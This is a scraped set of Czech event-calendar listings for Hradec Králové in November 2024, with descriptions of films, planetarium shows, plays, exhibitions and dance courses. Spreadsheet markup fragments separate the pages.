30.listopadu - sobota od 14:45 hodin Raz dva, raz dva… zkouška mikrofonu. Dvanáctiletý Ben nadevše miluje nejen muziku, ale i jídlo a vaření. A je to na něm taky znát. Když se ale jednoho dne zabouchne do spolužačky Klárky, rozhodne se s kily navíc zatočit. Na cestě za vysněnou postavou i Klárčiným srdcem mu pomáhají hlavně kamarádi z kapely a starostlivá maminka. Animovaný film režisérky Kristiny Dufkové natočený podle knižního bestselleru Mikaëla Olliviera s humorem za doprovodu nadupaných songů sleduje první strasti, lásky i nástrahy dospívání. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-11-30 15:00:00 2024-11-30 17:13:00 Princess MononokeMononoke hime 30.listopadu - sobota od 15:00 hodin Za dávných časů, v divokých hvozdech Japonska začíná mýtický boj mezi rozrůstající se civilizací lidí a zvířecími božstvy, která vládnou lesům. A také příběh lásky lidského dítěte vlčí bohyně - princezny Mononoke - a válečníka věřícího v mír mezi lidmi a přírodou - prince Ashitaky. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-11-30 15:00:00 2024-11-30 17:00:00 30.listopadu - sobota od 15:00 hodin Pod vedením lektorek si přijďte: ozdobit adventní věnec poskládat papírovou ozdobu vytvořit malý dekorativní stromek na stůl a hvězdu z přírodních materiálů na dveře odekorovat keramický zvonek Na závěr žehnání věnců. Hlídání menších dětí v herně zajištěno. Nebude chybět ani drobné občerstvení.Hradí se vstupné 50 Kč za rodinu, 200 Kč za jeden zelený korpus na věnec a přiměřené množství zdobícího materiálu a 75 Kč za keramický zvonek. Je třeba se přihlásit do pondělí 25. listopadu přes: https://www.sedmikraskahk.cz/rezervacni-system. 30.listopadu - sobota od 15:30 hodin astronomická pohádka Oříšky - Hledání dokonalé planety, hvězdná obloha s živým výkladem lektora digitální planetárium a hvězdárna 90 minut pořad vhodný pro diváky od 8 let v doprovodu dospělé osoby V digitálním planetáriu se nejprve podíváme na hvězdnou oblohu a souhvězdí. Následně se proletíme vesmírem. V poslední části programu se podíváme na astronomickou pohádku Oříšky - Hledání dokonalé planety. Následně je možné navštívit ještě budovu hvězdárny. Všechny návštěvníky žádáme, aby naše zařízení nenavštěvovali s příznaky jakéhokoliv infekčního onemocnění či zvýšenou teplotou. Změna programu vyhrazena. Upozorňujeme, že z bezpečnostních důvodů není možné vstupovat do sálu digitálního planetária po zahájení programu. 30.listopadu - sobota od 16:00 hodin Divadelní zpracování sci-fi legendy Scénář: Tomáš Jarkovský a Jakub Vašíček Režie: Jakub Vašíček Vyrobily dílny Divadla Drak: Roman Beran, Michaela Kudelková, Hana Kopová, Leyla Hruška Ottová, Štěpán Uherka Hrají: Barbara Jarkovská Humel, Pavla Lustyková, Mialn Žďárský, Dominik Linka Herbert George Wells napsal svůj román Válka světů již v roce 1898. Přesto jej francouzský časopis Le Monde zařadil na svůj seznam 100 nejdůležitějších knih 20. století (jedná se tak o vůbec nejstarší dílo na seznamu). Což jen dokládá význam tohoto románu, který ovlivnil podobu vědecko-fantastické literatury na celé dekády dopředu, inspiroval řadu dalších tvůrců a oslovil několik generací čtenářů na celém světě. Wellsův dramatický příběh o invazi Marťanů se dočkal také řady filmových a televizních zpracování v čele s hollywoodským trhákem z roku 2005 v režii Stevena Spielberga . Nejslavnější a také nejkontroverznější adaptace románu však nevznikla ani pro televizi, ani pro filmové plátno, nýbrž pro rozhlas. Na svědomí ji měl autorův téměř jmenovec – režisér Orson Welles . Ten pro americkou stanici CBS připravil rozhlasovou inscenaci vysílanou 30. října 1938, což je zároveň den, který je v samotné knize uváděn jako den počátku invaze. Tato skutečnost spolu se sugestivním Wellesovým zpracováním, které bylo celé stylizováno do podoby živého zpravodajství z invaze (sám režisér v něm účinkoval v roli fiktivního reportéra), vedla k tomu, že mezi posluchači na řadě míst USA vznikla panika, protože uvěřili, že k invazi skutečně právě dochází. Wellesovi tato rozhlasová inscenace přinesla jak řadu potíží s úřady, tak celosvětový věhlas a popularitu. Jednalo se o první zpracování fenoménu moci nově vznikajících masových médií, jejich schopnosti vytvářet klamné sugestivní obrazy, manipulovat realitu a ovlivňovat jednání a smýšlení velkých skupin obyvatel. Tedy fenoménu, který je nám dnes po téměř sto letech na jednu stranu již více než dobře známý, vůči kterému se ovšem na druhou stranu s rozvojem sociálních sítí či umělé inteligence zdáme jako společnost čím dál bezbrannější. Pojďte s námi prozkoumat svět, v němž už skoro není možné odlišit fikci od reality. Svět, ve kterém nic nemusí být tak, jak se zdá. Náš svět. Nebo naše světy? Mimochodem, jste si opravdu jistí, že tuto anotaci napsal živý člověk? The Wild Robot 30.listopadu - sobota od 16:30 hodin Co se stane robotovi, když se ocitne na opuštěném ostrově? Studio DreamWorks Animation , tvůrci série Jak vycvičit draka, v animovaném dobrodružství Rozzum v divočině tvrdí, že tu může najít srdce. Robotka z výrobní řady typu Rozzum (pro přátele Roz) byla zkonstruována, aby spolehlivě plnila úkoly od svých lidských zadavatelů. Když ovšem vinou nehody ztroskotá na ostrově, kde žádní lidé nejsou, netuší, co si s nabytou svobodou počít. A také se musí naučit, jak se adaptovat na nehostinné podmínky hroudy hlíny uprostřed oceánu obývané jen zvířaty. Roz má naštěstí natolik pokročilý software, že se naučí se zdejšími obyvateli komunikovat a spolupracovat, dokonce se stane adoptivní mámou osiřelého housete. Všechny její zdejší zážitky postupně vedou k tomu, že tam, kde dřív byl jen bezchybný počítačový program, jsou teď myšlenky, názory, nápady a hlavně city, které můžou být občas i nedokonalé. Robotí holka ve světě bez lidí zkrátka zlidštěla. Bohužel ji trochu dělají starosti její výrobci, kterým chybí jeden stroj a usilovně po něm pátrají, a pak taky její adoptivní ptačí synátor. Toho musí připravit na odlet do teplých krajin, než přijde zima. Film Rozzum v divočině je adaptací světového bestselleru spisovatele Petera Browna . Jméno hlavní hrdinky nese českou stopu, když odkazuje ke Karlovi Čapkovi a Rossumovým universálním robotům z jeho divadelní hry R. U. R. Režisér Chris Sanders (tvůrce filmů Jak vycvičit draka a Croodsovi) objevil knižní předlohu díky dceřině domácímu úkolu a okamžitě se do ní zamiloval. „I já mám rád velké dobrodružné příběhy, ale ještě víc mě těší, když v nich můžu pozorovat drobné, až intimní emocionální momenty, které si odnesete kina. Na tyhle scény se rád soustředím i jako tvůrce a tady jsem si to užil vrchovatě,“ říká režisér Sanders. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-11-30 17:00:00 2024-11-30 20:00:00 80 LET HRADECKÉHO JUDA 30.listopadu - sobota od 17:00 hodin Oslava k příležitosti 80let od založení hradeckého Juda pořádaná pro všechny, kteří svou historii spojili s naším oddílem, ať už jako závodníci, trenéři, funkcionáři nebo podporovatelé a sponzoři. Hundreds of Beavers 30.listopadu - sobota od 17:45 hodin Zálesák, ten těžký život má. Nakažlivě originální groteska pro nové milénium vám svým nonstop vírem kreativních nápadů a zběsilého humoru vyrve bránici z těla. Příběh z nelítostné doby, kdy příroda byla ještě nepokořená a plná nebezpečí, pojednává o palírníkovi jablkovice, který přijde o vše, ocitne se s holou zadnicí v divočině a musí se postupně nalevelovat až na nejlepšího zálesáka široko daleko. Při tom poměří důvtip, síly a houževnatost nejen s živly, ale také s roztodivnou zvířenou, v čele s titulními stovkami bobrů. Videoherně vyprávěný survival pro nové milénium oživuje žánr němých grotesek. V této mnohonásobně zábavnější i realizačně nápaditější parafrázi na REVENANT Zmrtvýchvstání místo DiCapria bojuje o přežití novodobý Buster Keaton a jeho zvířecí protivníky ztvárnili lidé v celotělových plyšových kostýmech ve stylu Studia Kamarád. Extatickými ohlasy oprávněně provázená indie senzace zahraničních žánrových festivalů, která sklidila nadšené reakce i na české premiéře během Festivalu otrlého diváka, je dílem hyperaktivních fantastů Rylanda Bricksona Colea Tewse a Mika Cheslika. Ti na sebe upozornili již prvním celovečerním projektem, fantasmagorickou explozí low-cost obrazotvornosti Příšera z Michiganského jezera, kde se prolínala láska ke klasickým béčkovým monster filmům se stylem Karla Zemana a Guy Maddina. Jejich novinka opět vyvěrá z frenetického stylu ADHD audiovize sociálních sítí, kterou tentokrát spojují s estetikou klasických hraných slapsticků a nespoutanou logikou animovaných grotesek ze série Looney Tunes, přičemž se ještě smočili také ve furry fandomu. Vybaveni uhrančivou DIY kreativitou navracejí kinu rozměr hurónské zábavy a senzace schopné vyvolávat nefalšovaný úžas. Sovy možná nejsou tím, čím se zdají být, ale o bobrech to platí dvojnásob. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-11-30 18:30:00 2024-11-30 20:08:00 WALL-E 30.listopadu - sobota od 18:30 hodin Lidé opustili Zemi před 700 lety a přesunuli se flotilu obřích plně automatizovaných hvězdoletů. Ze Země se stalo jedno velké smetiště a uklízecí roboti, kteří ji měli dát znovu do pořádku, přestali dávno fungovat. Zůstal jen poslední z nich, VALL-I. Ten každý den ráno navlékne housenkové pásy, nabije si sluneční články a se svým kamarádem švábem se vydává do práce. Osamělost, sbírání všemožných lidských předmětů, a hlavně koukání na videokazetu s muzikálem Hello Dolly! ho postupně proměnily v citově uvažujícího tvora, který touží po lásce. VALL-I jednoho dne objeví mezi smetím výhonek rašící zelené rostliny. Tentýž den zažije i další nečekanou událost, setkává se s robotkou Evou, která byla vyslána z hvězdoletu Axiom zjistit, zda je planeta obyvatelná. VALL-I pozve Evu do svého příbytku a ukáže jí všechny své poklady, včetně zelené rostlinky. K jeho úžasu mu Eva rostlinu sebere a vypne se. Čeká pouze, až bude přepravena zpět na Axiom. Když pro ni dorazí raketa, zamilovaný VALL-I ji odmítá opustit. 160 vstupné 160 Kč | Velký sál | Bio Central Velký sál 2024-11-30 18:30:00 2024-11-30 20:00:00 30.listopadu - sobota od 18:30 hodin · hvězdná obloha, virtuální vesmír a celooblohová filmová projekce Jiné světy · digitální planetárium · 90 minut · pořad vhodný pro dospělé a mládež od staršího školního věku V digitálním planetáriu se nejprve podíváme na aktuální noční oblohu bez světelného znečištění. Následně podnikneme virtuální cestu do vesmíru. V poslední části programu zhlédneme celooblohovou filmovou projekci Jiné světy. Všechny návštěvníky žádáme, aby naše zařízení nenavštěvovali s příznaky jakéhokoliv infekčního onemocnění či zvýšenou teplotou. Dodržujte pokyny pracovníků zajišťujících program, ustanovení Návštěvního řádu a aktuálně obecně platná opatření či doporučení. Změna programu vyhrazena. Upozorňujeme, že z bezpečnostních důvodů není možné vstupovat do sálu digitálního planetária po zahájení programu. Snížené vstupné na programy Hvězdárny a planetária v Hradci Králové je určeno pro děti do 10 let, žáky a studenty od 10 do 26 let, držitele průkazek ZTP/P a seniory od 65 let. „…TVŮJ VĚČNĚ BEDŘICH“ JITKA ČECHOVÁ &amp;amp; VLADIMÍR JAVORSKÝ 30.listopadu - sobota od 19:00 hodin Staňte se součástí jedinečného hudebně-literárního večera, který se koná u příležitosti 200. výročí narození Bedřicha Smetany a 160. výročí založení společnosti PETROF . Tento výjimečný koncert propojí romantický zvuk klavíru PETROF s uměleckým přednesem, aby nám přiblížil život a dílo jednoho z největších českých skladatelů. Jitka Čechová , uznávaná česká klavíristka, svým mistrovským přednesem, vnitřní silou i citlivostí k tématu dokáže dokonale vystihnout duši Smetanových opusů. Kromě hudby vás čeká i nezapomenutelný literární zážitek. Herec Vladimír Javorský bude číst z deníků a dopisů Bedřicha Smetany , které odhalí nejen jeho umělecký svět, ale i osobní život plný lásky, bolesti a inspirace. Zažijte atmosféru 19. století, společně nahlédneme do intimních zákoutí Smetanova života. Pro lepší poznání mistra bude Vladimír Javorský číst z deníků a dopisů, které skladatelovo životní panoráma dokreslují do mnohdy až syrových detailů: čeká nás vůně piva , půvab tance, dvě manželky, šest dětí, švédské putování i krutá nemoc. Oslavme společně 200 let od narození Bedřicha Smetany a 160 let od vzniku firmy PETROF . Přijďte se nechat inspirovat a užít si nezapomenutelný večer plný hudby a literatury. Vystupující Vojtěch MatochaRežie: Pavel Khek 30.listopadu - sobota od 19:00 hodin Prašina je tajuplné místo uprostřed Prahy . Nikdo neví proč, ale na Prašině nefunguje elektřina. Lampy tu nesvítí, tramvaje nejezdí, rádio nehraje, mobil je bez signálu. Jako kdyby se tam zastavil čas, ale zdání klame. Trojice nerozlučných kamarádů Jirka, En a Tonda začnou pátrat po tajemstvích z minulosti. Čelit musí řadě nebezpečí, které prověří nejen jejich odvahu, ale také jejich přátelství. A netoužíme všichni po místě, kde není internet, je tam tma a ticho a nejsme neustále online? Není to tak, že ve světě plném pokroku ztrácíme jeden druhého, ale i svoji vlastní duši? Co takhle na chviličku utéct a prožít něco reálného? Prašina se stala bestsellerem a čtenáře si získala jak mezi dětmi, tak mezi dospělými. Klicperovo divadlo uvede titul na divadelních prknech jako první v České republice . Kniha byla v roce 2019 nominována na Cenu Magnesia Litera v kategorii Litera pro děti a mládež. Vojtěch Matocha napsal již dvě pokračování a chystá se i filmové zpracování tohoto fenoménu. Délka představení 2:20 s přestávkou. Doporučeno divákům od 10 let. 320 vstupné 280 Kč, 320 Kč | Hlavní scéna | KLICPEROVO DIVADLO o.p.s. Hlavní scéna 2024-11-30 19:00:00 2024-11-30 20:30:00 KOUZELNÝ ADVENT &amp;amp; PANOVA FLÉTNA, VARHANY 30.listopadu - sobota od 19:00 hodin Jedinečný hudební zážitek! Poznejte čarovné tóny netradičního hudebního nástroje Panova flétna a přeneste se společně do světa filmového plátna. Tentokrát se přidají i varhany. Petr Tomeček - Panova flétna Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>20241101_631_3239872417_b323ea111e0967dfba8c.html</t>
  </si>
  <si>
    <t>b323ea111e0967dfba8c</t>
  </si>
  <si>
    <t>Kalendarium 27.února - čtvrtek od 19:00 hodin Kulturní akce dne: 29. 11. 2024 2024-11-15 00:00:00 2025-01-17 18:00:00 PREMIÉRA 2024 29.listopadu - pátek od 00:00 hodin V letošním již 35. ročníku fotografické soutěže Premiéra, které bylo vyhlášeno na volné téma, bylo předloženo 431 fotografií od 55 účastníků. Odborná porota ve složení Petr Zatloukal , fotograf a pedagog, Vítězslav Krejčí , fotograf, zástupce firmy FOMA Bohemia a Barbora Pejšková , výtvarnice, fotografka, pedagožka, udělila 14 cen a 6 čestných uznání. Fotografie vybrané porotou budou vystaveny v Galerii na Hradě v Hradci Králové . Slavnostní zahájení s hudebním doprovodem kapely Gankino Quintet proběhne ve čtvrtek 14. listopadu v 17 hodin. Další vybrané fotografie budou od 1. 11. vystaveny v Galerii Suterén Turistického a informačního centra v Hradci Králové . Dne 23. listopadu v 10 hodin proběhne v sále Albrechta z Valdštejna Krajského úřadu Královéhradeckého kraje vyhlášení cen a rozborový seminář se členy poroty. Seminář bude doplněn prezentací tvorby předsedy poroty Petra Zatloukala. UNIVERZITA HRADEC KRÁLOVÉ: DNES SLAVÍ! 29.listopadu - pátek od 00:01 hodin Dovolujeme si vás pozvat na výstavu prací studentů 2. ročníku oboru Grafická a intermediální tvorba Katedry výtvarné kultury a textilní tvorby PF UHK, kteří představí výběr plakátů k oslavám 75. výročí založení Studijní a vědecké knihovny v Hradci Králové . Práce vznikly ve spolupráci se SVK HK. Práce můžete vidět v prostoru budovy už 8. 11. Výstavu najdete ve 2. NP v galerii Automat. 29.listopadu - pátek od 00:01 hodin Pátek 15–20 hodin Sobota 9–19 hodin Neděle 9–16 hodin Těsné okolí muzejní budovy na Eliščině nábřeží a část ulice Palackého bude patřit téměř stovce producentů, řemeslníků a prodejců s širokou nabídkou adventních věnců, dekorací, perníků, šperků, svíček z včelího vosku, mýdla či perličkových ozdob z Poniklé a dalších produktů. Samozřejmostí se stalo zastoupení řemeslníků oceněných titulem „Nositel tradice lidových řemesel České republiky “ a také výrobců dodržujících tradiční výrobní postupy zapsané na republikovém Seznamu nemateriálních kulturních statků ČR nebo na Reprezentativním seznamu nemateriálního kulturního dědictví lidstva. Doprovodný program: * pěvecký sbor Laděníčko ZUŠ Střezina pod vedením Lady Holaňové, * v sobotu a v neděli se budou konat speciální dílny s řemeslníky, z nichž někteří jsou držiteli ocenění „Zlatý kolovrat“ nebo „Nositel tradice lidových řemesel“. Ve vestibulech tak bude možné nahlédnout pod ruce řezbáře a vyzkoušet si například techniku modrotisku zapsanou na reprezentativním seznamu UNESCO, objevit kouzlo zdobených perníčků, naučit se základy výroby figurek ze šustí, vyzkoušet si drátování nebo výrobu ze skleněných korálků . Nebude chybět vánoční zvykosloví, které představí Spolek lidové tvorby Hradec Králové * komentované prohlídky aktuálních výstav a stálé expozice * vánoční fotoateliér * venkovní dětské projížďky na oslících Venkovní program trhů je zdarma. Jednotné vstupné 90 Kč platí pouze do vnitřních prostor muzea a umožňuje návštěvu všech výstav a expozice. SALON VÝCHODOČESKÉ FOTOGRAFIE 29.listopadu - pátek od 00:01 hodin Výstava 7. ročníku Salonu východočeské fotografie, vyhledávané přehlídky, která se koná jednou za tři roky, a je výběrovým přehledem aktuální tvorby fotografů nejen východních Čech . Své fotografie zde vystaví 41 autorů a 6 hostů (Radek Kalhous, Martina Kopecká Jurčeková, Ctibor Košťál , Zdeněk Vojáček, Luděk Vojtěchovský , Roman Vondrouš). Porotkyně Štěpánka Bieleszová , kurátorka sbírky fotografie Muzea umění Olomouc , a Kamila Bendorffová, fotografka, cestovatelka, organizátorka fotofestivalu v Blatné , ocenily širokou škálu stylů, témat a technologických procesů, z nichž každý divákovi nabízí něco jedinečného. Porota letošní 7. ročník Salonu východočeské fotografie chápe jako mimořádnou příležitost povzbudit a objevit regionální tvůrce, kteří, ačkoli nepůsobí v centru dění, jsou schopni velmi originálně vidět svět v novém světle. FOTÍME EVROPU, JIŽ 20 LET! 29.listopadu - pátek od 08:00 hodin Výstava soutěžních snímků z letní fotosoutěže pořádané informačními středisky Europe Direct Hradec Králové a Europe Direct Pardubice a Eurocentry Hradec Králové a Pardubice . Fotosoutěž byla v letošním roce zaměřena na proměnu Evropy v průběhu 20 let členství ČR v EU. Cílem fotosoutěže tak bylo zachytit jedinečnost a rozmanitost Evropy v proměnách času. Spolufinancováno EU. Vstup volný. 29.listopadu - pátek od 09:00 hodin V listopadu a prosinci 2024 si můžete v PETROF Gallery už podruhé prohlédnout “Pastely” Nadi Voldánové. Její obrazy nabízejí realistický pohled na objekty ze života kolem nás v kontrastu s černou a bílou plochou v osobitém pojetí výtvarnice, členky Unie výtvarných umělců Královéhradeckého regionu a také Náchodského výtvarného ateliéru Amag. Unikátní atmosféru hudební kavárny doplní přehlídka děl, vyvolávajících pocity pohody. Autorka, žijící střídavě v Praze a v České Skalici , se věnuje technice suchého pastelu, která jí umožňuje realizovat výtvarné záměry. VÝSTAVA SOUTĚŽNÍCH FOTOGRAFIÍ PREMIÉRA 29.listopadu - pátek od 09:00 hodin V letošním již 35. ročníku fotografické soutěže Premiéra, které bylo vyhlášeno na volné téma, bylo předloženo 431 fotografií od 55 účastníků. Odborná porota ve složení Petr Zatloukal , fotograf a pedagog, Vítězslav Krejčí , fotograf, zástupce firmy FOMA Bohemia a Barbora Pejšková , výtvarnice, fotografka, pedagožka, udělila 14 cen a 6 čestných uznání. Fotografie vybrané porotou budou vystaveny v Galerii na Hradě v Hradci Králové . Slavnostní zahájení s hudebním doprovodem kapely Gankino Quintet proběhne ve čtvrtek 14. listopadu v 17 hodin. Další vybrané fotografie budou od 1. 11. vystaveny v Galerii Suterén Turistického a informačního centra v Hradci Králové . Dne 23. listopadu v 10 hodin proběhne v sále Albrechta z Valdštejna Krajského úřadu Královéhradeckého kraje vyhlášení cen a rozborový seminář se členy poroty. Seminář bude doplněn prezentací tvorby předsedy poroty Petra Zatloukala. 29.listopadu - pátek od 10:00 hodin Kdo by neznal Kelty, jejich oppida a společnost? Doklady jejich přítomnosti pochází z celé republiky, avšak velká část východních Čech se nachází mimo centrum našeho keltského světa. Výstava představí právě tyto okrajové oblasti a zodpoví otázku, jestli zdejší krajinou chodili druidové nebo zde keltské lišky dávaly dobrou noc. 29.listopadu - pátek od 10:00 hodin 9. 10. - 30. 11. 2024 Vernisáž výstavy 9. října v 18 hodin. Otevřeno: Po - Pá 10 - 13, 14 - 17 / So 11 - 16 hod. Galerie Koruna, Rokitanského 169, (Svatojánské náměstí), 500 03 Hradec Králové tel.: +420495513009 29.listopadu - pátek od 14:00 hodin Pá: 14:00-18:00 Autor: OMEGA Czech - info@omegaczech.cz</t>
  </si>
  <si>
    <t>20241101_632_3239872132_21663b284bd77cef693c.html</t>
  </si>
  <si>
    <t>21663b284bd77cef693c</t>
  </si>
  <si>
    <t>Kalendarium 27.února - čtvrtek od 19:00 hodin Kulturní akce dne: 08. 11. 2024 2024-11-04 08:00:00 2024-11-30 12:00:00 FOTÍME EVROPU, JIŽ 20 LET! 08.listopadu - pátek od 08:00 hodin Výstava soutěžních snímků z letní fotosoutěže pořádané informačními středisky Europe Direct Hradec Králové a Europe Direct Pardubice a Eurocentry Hradec Králové a Pardubice . Fotosoutěž byla v letošním roce zaměřena na proměnu Evropy v průběhu 20 let členství ČR v EU. Cílem fotosoutěže tak bylo zachytit jedinečnost a rozmanitost Evropy v proměnách času. Spolufinancováno EU. Vstup volný. 08.listopadu - pátek od 09:00 hodin V listopadu a prosinci 2024 si můžete v PETROF Gallery už podruhé prohlédnout “Pastely” Nadi Voldánové. Její obrazy nabízejí realistický pohled na objekty ze života kolem nás v kontrastu s černou a bílou plochou v osobitém pojetí výtvarnice, členky Unie výtvarných umělců Královéhradeckého regionu a také Náchodského výtvarného ateliéru Amag. Unikátní atmosféru hudební kavárny doplní přehlídka děl, vyvolávajících pocity pohody. Autorka, žijící střídavě v Praze a v České Skalici , se věnuje technice suchého pastelu, která jí umožňuje realizovat výtvarné záměry. VÝSTAVA SOUTĚŽNÍCH FOTOGRAFIÍ PREMIÉRA 08.listopadu - pátek od 09:00 hodin V letošním již 35. ročníku fotografické soutěže Premiéra, které bylo vyhlášeno na volné téma, bylo předloženo 431 fotografií od 55 účastníků. Odborná porota ve složení Petr Zatloukal , fotograf a pedagog, Vítězslav Krejčí , fotograf, zástupce firmy FOMA Bohemia a Barbora Pejšková , výtvarnice, fotografka, pedagožka, udělila 14 cen a 6 čestných uznání. Fotografie vybrané porotou budou vystaveny v Galerii na Hradě v Hradci Králové . Slavnostní zahájení s hudebním doprovodem kapely Gankino Quintet proběhne ve čtvrtek 14. listopadu v 17 hodin. Další vybrané fotografie budou od 1. 11. vystaveny v Galerii Suterén Turistického a informačního centra v Hradci Králové . Dne 23. listopadu v 10 hodin proběhne v sále Albrechta z Valdštejna Krajského úřadu Královéhradeckého kraje vyhlášení cen a rozborový seminář se členy poroty. Seminář bude doplněn prezentací tvorby předsedy poroty Petra Zatloukala . KLUBÍK HVĚZDIČKA – HOTEL ZIMNÍ SPÁNEK 08.listopadu - pátek od 09:30 hodin Zima nám již klepe na dveře a to se mnohá zvířátka uchylují k dlouhé zimní dovolené. Přijďte se spolu s námi podívat do vyhlášeného Hotelu Zimní spánek. Pro nejmenší čtenáře a jejich rodiče. Přihlášení na mpa@knihovnahk.cz. Vstup volný. 08.listopadu - pátek od 10:00 hodin Kdo by neznal Kelty, jejich oppida a společnost? Doklady jejich přítomnosti pochází z celé republiky, avšak velká část východních Čech se nachází mimo centrum našeho keltského světa. Výstava představí právě tyto okrajové oblasti a zodpoví otázku, jestli zdejší krajinou chodili druidové nebo zde keltské lišky dávaly dobrou noc. 08.listopadu - pátek od 10:00 hodin 9. 10. - 30. 11. 2024 Vernisáž výstavy 9. října v 18 hodin. Otevřeno: Po - Pá 10 - 13, 14 - 17 / So 11 - 16 hod. Galerie Koruna, Rokitanského 169 (Svatojánské náměstí), 500 03 Hradec Králové tel.: +420495513009 TRÉNINKY PAMĚTI PRO SENIORY 08.listopadu - pátek od 10:00 hodin Zveme všechny, kteří si chtějí zachovat duševní kondici a aktivovat mozek na optimální výkonnost. Lektorkou je Mgr. Ludmila Valešová. Místo je nutné si rezervovat na tel. 495 268 288 nebo e-mailu nhk@knihovnahk.cz. Vstupné 20 Kč. Lee 08.listopadu - pátek od 14:30 hodin Lee Millerová (Kate Winslet) začala svou kariéru jako prominentní modelka, pohybující se v předních módních kruzích Paříže a New Yorku . V roce 1938 tráví dovolenou na prosluněném jihu Francie se svými nejbližšími přáteli z uměleckých kruhů. Soustředí se již výhradně na svou vlastní práci jako fotografka. Její osudovou láskou se stává anglický obchodník s uměním, Roland Penrose ( Alexander Skarsgard ). Hrozba války visí ve vzduchu a téměř přes noc se všechno v jejich každodenním životě zcela změní. Po přestěhování do Londýna Lee odmítá dělat, co se od žen během války očekává. Místo toho se rozhodne postavit patriarchátu a dokázat nemožné. Samotná se vydává na frontu v Evropě . Jako válečná korespondentka a fotografka pro magazín Vogue se ocitá v první linii nejkrutějších bojů druhé světové války. Její hluboké pochopení a empatie pro ženy a bezhlasé oběti hrozných zločinů jí umožní vytvořit snímky zachycující jak křehkost, tak nezlomnou zuřivost a lidskou schopnost přežít, existovat, bojovat, bránit se a žít. Lee je často vnímaná jako model a múza, ale její vnitřní síla, houževnatost, vášeň pro život a odvaha riskovat jí pomohlo vytvořit děsivě naléhavé snímky, které se nesmazatelně vryjí do historie. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-11-08 16:30:00 2024-11-08 17:30:00 Dětský pořad vhodný pro diváky ve věku od 5 do 8 let. 08.listopadu - pátek od 16:30 hodin - astronomická pohádka a hvězdná obloha s živým výkladem lektora - digitální planetárium - 60 minut - pořad vhodný pro diváky od 5 let do 8 let v doprovodu dospělé osoby Pořad, který je svým obsahem i délkou uzpůsoben pro nejmenší návštěvníky. V digitálním planetáriu se nejprve podíváme na hvězdnou oblohu a prohlédneme si souhvězdí. Druhá část programu bude věnována pohádce. Všechny návštěvníky žádáme, aby naše zařízení nenavštěvovali s příznaky jakéhokoliv infekčního onemocnění či zvýšenou teplotou. Změna programu vyhrazena. Upozorňujeme, že z bezpečnostních důvodů není možné vstupovat do sálu digitálního planetária po zahájení programu. 08.listopadu - pátek od 17:00 hodin Zveme vás na druhý ročník Halloweenské lampiónové stezky! Těšíme se na všechny malé i velké účastníky! Pro naše nejmenší dobrodruhy jsme opět připravili několik zábavných stanovišť s úkoly. Po splnění úkolů se bude konat krátký lampiónový průvod. Takže přineste svůj lampión a nezapomeňte na strašidelné kostýmy! WavesVlny 08.listopadu - pátek od 17:15 hodin Dobový film Vlny režiséra Jiřího Mádla ukáže napínavé a doposud utajené příběhy novinářů Československého rozhlasu. Na konci 60. let, kdy zněl z rádiových vln rokenrol a studentské revolty měnily svět, nastoupí starší z bratrů do prestižní redakce rozhlasu. Záhy se ocitne v nebezpečném souboji redaktorů a tajných služeb. Ve víru událostí půjde brzy všem o život a hlavní hrdina stojí před drsnou volbou: ochránit bratra, nebo pravdu a kolegy? Film je inspirován skutečným příběhem skupiny novinářů mezinárodní redakce Československého rozhlasu a jejich odhodláním přinášet nezávislé zprávy za každou cenu. 160 vstupné 160 Kč | Malý sál | Bio Central Malý sál 2024-11-08 17:30:00 2024-11-08 19:30:00 08.listopadu - pátek od 17:30 hodin KURZ TANCE A SPOLEČENSKÉ VÝCHOVY MLÁDEŽE • taneční kurzy s dlouholetou tradicí • kvalitní výuka vkusně a zábavně • podmanivé prostředí historické budovy Adalbertina • renomovaný taneční mistr TOMÁŠ CHMEL a TAK Dance KROK • hudební doprovod tanečního orchestru EGO RETRO MUSIC • kultivovaná zábava a přátelská atmosféra • devět lekcí, tři Prodloužené, velkolepý Věneček TERMÍNY LEKCÍ - KURZ B 06. září 1. lekce 20:00 - 22:00 hod. 13. září 2. lekce 17:30 - 19:30 hod. 20. září 3. lekce 20:00 - 22:00 hod. 27. září 4. lekce 17:30 - 19:30 hod. 04. října I. Prodloužená 20:00 - 23:00 hod. 11. října 5. lekce 17:30 - 19:30 hod. - Karneval v Riu 18. října 6. lekce 20:00 - 22:00 hod. 25. října 7. lekce 17:30 - 19:30 hod. 01. listopadu II. Prodloužená 20:00 - 23:00 hod. 08. listopadu 8. lekce 17:30 - 19:30 hod. 15. listopadu III. Prodloužená 20:00 - 23:00 hod. 22. listopadu 9. lekce - Nácvičná 19:30 - 21:00 hod. 01. prosince Věneček 17:00 - 21:00 hod. Klasické lekce: cena vstupenky: 150,- Kč; dítě do 6 let 100,- Kč Prodloužené lekce: cena vstupenky: 200,- Kč Věneček: cena vstupenky 300 Kč, k prodeji pouze na pokladně Adalbertina: - KURZ B - 25. října 2024 od 16:30 hodin - KURZ A - 01. listopadu od 16:30 hodin Případné zbylé vstupenky budou nabídnuty do prodeje v následných lekcích. Počet vstupenek je omezen na max. 3 kusy na kurzistu. Využijte místa na přísálí, slavnostní večer promítáme na velkoplošné projekční plátno. Aneta 08.listopadu - pátek od 17:30 hodin Třiadvacetiletá Aneta spáchala sebevraždu třinácti ranami nožem. Ne, nejde o námět hororové sci-fi, ale o oficiální závěr české policie. A také o příběh snad nejkontroverznějšího kriminálního případu moderní historie. Případu, který se odehrál už před deseti lety. To ale neznamená, že je čas zapomenout. Naopak! Dokument Aneta přinese nové, naprosto zásadní informace a zjištění, která mohou znamenat zásadní zvrat v celé kauze 180 vstupné 180 Kč | Velký sál | Bio Central Velký sál 2024-11-08 18:00:00 2024-11-08 19:30:00 ŠVANKMAJER A FENOMÉN JÍDLA 08.listopadu - pátek od 18:00 hodin V kultuře a umění se celou historii objevuje jeden ze zajímavých fenoménů, který se stává součástí obrazů, knih, či je předlohou pro děsivé postavy, jako byli obři nebo přerostlí trolové. A stalo se také obsedantním tématem významného českého výtvarníka a filmaře Jana Švankmajera . Pokusíme se propojit zážitek z několika autorových filmů s unikátním vícechodovým menu profesionálního kuchaře Četra, který přímo před vašima očima připraví dobroty, po kterých se Vám bude ještě dlouho stýskat! Vstupné 450 Kč. Počet míst je omezen, proto si včas udělejte rezervaci na e-mail clubcafe.pessoa@ops.cz nebo sms na číslo 736 